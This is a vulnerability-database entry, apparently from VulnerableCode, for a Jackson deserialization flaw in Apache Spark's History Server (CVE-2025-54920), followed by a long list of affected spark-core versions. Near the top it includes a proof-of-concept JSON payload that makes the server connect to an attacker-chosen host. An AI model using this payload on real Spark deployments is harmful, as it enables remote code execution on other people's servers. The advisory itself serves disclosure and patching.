Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-1gtx-thb1-9ud6
Summary
Apache Spark: Spark History Server Code Execution Vulnerability
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

## Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

## Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

## Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:

```
{

  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {
    "hive.metastore.uris": "thrift://<IP>:<PORT>"
  }
}
```
3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

## Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
Aliases
0
alias CVE-2025-54920
1
alias GHSA-jwp6-cvj8-fw65
Fixed_packages
0
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
1
url pkg:maven/org.apache.spark/spark-core_2.13@3.5.7
purl pkg:maven/org.apache.spark/spark-core_2.13@3.5.7
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.13@3.5.7
2
url pkg:maven/org.apache.spark/spark-core_2.13@4.0.1
purl pkg:maven/org.apache.spark/spark-core_2.13@4.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.13@4.0.1
Affected_packages
0
url pkg:maven/org.apache.spark/spark-core_2.10@0.9.0-incubating
purl pkg:maven/org.apache.spark/spark-core_2.10@0.9.0-incubating
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@0.9.0-incubating
1
url pkg:maven/org.apache.spark/spark-core_2.10@0.9.1
purl pkg:maven/org.apache.spark/spark-core_2.10@0.9.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@0.9.1
2
url pkg:maven/org.apache.spark/spark-core_2.10@0.9.2
purl pkg:maven/org.apache.spark/spark-core_2.10@0.9.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@0.9.2
3
url pkg:maven/org.apache.spark/spark-core_2.10@1.0.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.0.0
4
url pkg:maven/org.apache.spark/spark-core_2.10@1.0.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.0.1
5
url pkg:maven/org.apache.spark/spark-core_2.10@1.0.2
purl pkg:maven/org.apache.spark/spark-core_2.10@1.0.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.0.2
6
url pkg:maven/org.apache.spark/spark-core_2.10@1.1.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.1.0
7
url pkg:maven/org.apache.spark/spark-core_2.10@1.1.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.1.1
8
url pkg:maven/org.apache.spark/spark-core_2.10@1.2.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.2.0
9
url pkg:maven/org.apache.spark/spark-core_2.10@1.2.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.2.1
10
url pkg:maven/org.apache.spark/spark-core_2.10@1.2.2
purl pkg:maven/org.apache.spark/spark-core_2.10@1.2.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.2.2
11
url pkg:maven/org.apache.spark/spark-core_2.10@1.3.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.3.0
12
url pkg:maven/org.apache.spark/spark-core_2.10@1.3.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.3.1
13
url pkg:maven/org.apache.spark/spark-core_2.10@1.4.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.4.0
14
url pkg:maven/org.apache.spark/spark-core_2.10@1.4.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.4.1
15
url pkg:maven/org.apache.spark/spark-core_2.10@1.5.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.5.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.5.0
16
url pkg:maven/org.apache.spark/spark-core_2.10@1.5.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.5.1
17
url pkg:maven/org.apache.spark/spark-core_2.10@1.5.2
purl pkg:maven/org.apache.spark/spark-core_2.10@1.5.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.5.2
18
url pkg:maven/org.apache.spark/spark-core_2.10@1.6.0
purl pkg:maven/org.apache.spark/spark-core_2.10@1.6.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.6.0
19
url pkg:maven/org.apache.spark/spark-core_2.10@1.6.1
purl pkg:maven/org.apache.spark/spark-core_2.10@1.6.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.6.1
20
url pkg:maven/org.apache.spark/spark-core_2.10@1.6.2
purl pkg:maven/org.apache.spark/spark-core_2.10@1.6.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.6.2
21
url pkg:maven/org.apache.spark/spark-core_2.10@1.6.3
purl pkg:maven/org.apache.spark/spark-core_2.10@1.6.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@1.6.3
22
url pkg:maven/org.apache.spark/spark-core_2.10@2.0.0
purl pkg:maven/org.apache.spark/spark-core_2.10@2.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.0.0
23
url pkg:maven/org.apache.spark/spark-core_2.10@2.0.0-preview
purl pkg:maven/org.apache.spark/spark-core_2.10@2.0.0-preview
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.0.0-preview
24
url pkg:maven/org.apache.spark/spark-core_2.10@2.0.1
purl pkg:maven/org.apache.spark/spark-core_2.10@2.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.0.1
25
url pkg:maven/org.apache.spark/spark-core_2.10@2.0.2
purl pkg:maven/org.apache.spark/spark-core_2.10@2.0.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.0.2
26
url pkg:maven/org.apache.spark/spark-core_2.10@2.1.0
purl pkg:maven/org.apache.spark/spark-core_2.10@2.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-pgne-36yk-37bj
7
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.1.0
27
url pkg:maven/org.apache.spark/spark-core_2.10@2.1.1
purl pkg:maven/org.apache.spark/spark-core_2.10@2.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-pgne-36yk-37bj
7
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.1.1
28
url pkg:maven/org.apache.spark/spark-core_2.10@2.1.2
purl pkg:maven/org.apache.spark/spark-core_2.10@2.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-adht-u2kn-j3hh
2
vulnerability VCID-as3y-ffvw-rube
3
vulnerability VCID-m3tv-j5mk-4ufj
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-pgne-36yk-37bj
6
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.1.2
29
url pkg:maven/org.apache.spark/spark-core_2.10@2.1.3
purl pkg:maven/org.apache.spark/spark-core_2.10@2.1.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-adht-u2kn-j3hh
2
vulnerability VCID-as3y-ffvw-rube
3
vulnerability VCID-m3tv-j5mk-4ufj
4
vulnerability VCID-pa42-1gk4-9yhj
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.1.3
30
url pkg:maven/org.apache.spark/spark-core_2.10@2.2.0
purl pkg:maven/org.apache.spark/spark-core_2.10@2.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-pgne-36yk-37bj
4
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.2.0
31
url pkg:maven/org.apache.spark/spark-core_2.10@2.2.1
purl pkg:maven/org.apache.spark/spark-core_2.10@2.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-pgne-36yk-37bj
4
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.2.1
32
url pkg:maven/org.apache.spark/spark-core_2.10@2.2.2
purl pkg:maven/org.apache.spark/spark-core_2.10@2.2.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.2.2
33
url pkg:maven/org.apache.spark/spark-core_2.10@2.2.3
purl pkg:maven/org.apache.spark/spark-core_2.10@2.2.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.10@2.2.3
34
url pkg:maven/org.apache.spark/spark-core_2.11@1.2.0
purl pkg:maven/org.apache.spark/spark-core_2.11@1.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.2.0
35
url pkg:maven/org.apache.spark/spark-core_2.11@1.2.1
purl pkg:maven/org.apache.spark/spark-core_2.11@1.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.2.1
36
url pkg:maven/org.apache.spark/spark-core_2.11@1.2.2
purl pkg:maven/org.apache.spark/spark-core_2.11@1.2.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-pa42-1gk4-9yhj
5
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.2.2
37
url pkg:maven/org.apache.spark/spark-core_2.11@1.3.0
purl pkg:maven/org.apache.spark/spark-core_2.11@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.3.0
38
url pkg:maven/org.apache.spark/spark-core_2.11@1.3.1
purl pkg:maven/org.apache.spark/spark-core_2.11@1.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.3.1
39
url pkg:maven/org.apache.spark/spark-core_2.11@1.4.0
purl pkg:maven/org.apache.spark/spark-core_2.11@1.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.4.0
40
url pkg:maven/org.apache.spark/spark-core_2.11@1.4.1
purl pkg:maven/org.apache.spark/spark-core_2.11@1.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.4.1
41
url pkg:maven/org.apache.spark/spark-core_2.11@1.5.0
purl pkg:maven/org.apache.spark/spark-core_2.11@1.5.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.5.0
42
url pkg:maven/org.apache.spark/spark-core_2.11@1.5.1
purl pkg:maven/org.apache.spark/spark-core_2.11@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.5.1
43
url pkg:maven/org.apache.spark/spark-core_2.11@1.5.2
purl pkg:maven/org.apache.spark/spark-core_2.11@1.5.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.5.2
44
url pkg:maven/org.apache.spark/spark-core_2.11@1.6.0
purl pkg:maven/org.apache.spark/spark-core_2.11@1.6.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.6.0
45
url pkg:maven/org.apache.spark/spark-core_2.11@1.6.1
purl pkg:maven/org.apache.spark/spark-core_2.11@1.6.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.6.1
46
url pkg:maven/org.apache.spark/spark-core_2.11@1.6.2
purl pkg:maven/org.apache.spark/spark-core_2.11@1.6.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
